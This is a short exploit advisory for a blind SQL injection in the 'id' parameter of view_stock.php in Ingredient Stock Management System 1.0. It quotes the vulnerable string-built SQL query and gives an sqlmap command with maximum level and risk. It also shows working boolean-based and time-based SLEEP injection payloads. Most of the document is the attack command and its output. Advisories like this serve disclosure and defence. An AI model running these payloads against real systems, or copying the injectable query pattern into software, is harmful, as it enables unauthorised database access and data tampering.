Ingredient Stock Management System 1.0 SQL Injection

# Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection# Date: 28/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, LinuxDescription :----------------------Ingredient Stock Management System 1.0 allows SQL Injection via parameter 'id' in/isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromisethe application, access or modify data, or exploit latent vulnerabilitiesin the underlying database# Vulnerable Code :line 74 in file "/isms/admin/stocks/view_stock.php"$stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc");# Sqlmap command:sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM (SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP